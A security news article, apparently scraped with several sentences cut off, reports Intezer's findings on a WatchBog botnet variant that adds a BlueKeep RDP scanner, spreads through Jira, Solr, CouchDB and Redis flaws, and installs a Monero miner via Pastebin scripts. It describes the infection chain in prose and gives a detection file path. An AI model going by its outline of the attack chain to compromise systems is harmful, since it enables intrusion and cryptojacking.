Researchers at Intezer have discovered a new variant of WatchBog, a Linux-based cryptocurrency mining botnet, that also includes a module to scan the Internet for Windows RDP servers vulnerable to the Bluekeep vulnerability (CVE-2019-0708).
“We have discovered a new version of WatchBog—a cryptocurrency-mining botnet operational since late 2018—that we suspect has compromised more than 4,500 Linux machines in newer campaigns taking place since early June.” reads a blog post published by Intezer.
“Among the new Linux exploits, this version of WatchBog implements a BlueKeep RDP protocol vulnerability scanner module, which suggests that
As explained by Microsoft, this vulnerability could be exploited by malware with
The new variant of the malware is currently undetected by most of the antivirus firms, the incorporation of the BlueKeep scanner suggests that operators would explore financial opportunities on Windows platforms too.
The BlueKeep scanner implemented in the WatchBog scans the Internet for vulnerable systems and submits the RC$-encrypted list of RDP hosts, to servers controlled by its operators.
The malware also includes scanners for Jira and Solr flaws along with Brute-forcing module for CouchDB and Redis installs.
“Once a vulnerable service is discovered to which exists an exploit module, the binary spreads itself by invoking the right exploit and installing a malicious bash script hosted on Pastebin.” continues the analysis.
“We were able to find an early test version of the spreader module uploaded to
Once discovered a vulnerable system, the WatchBog deploys a script on the targeted machine to download and execute a Monero miner from Pastebin.
The script gains persistence
Intezer experts recommend updating software to its latest version, Linux users can check for the presence of WatchBog by verifying the existence of the “/tmp/.tmplassstgggzzzqpppppp12233333” file or the “/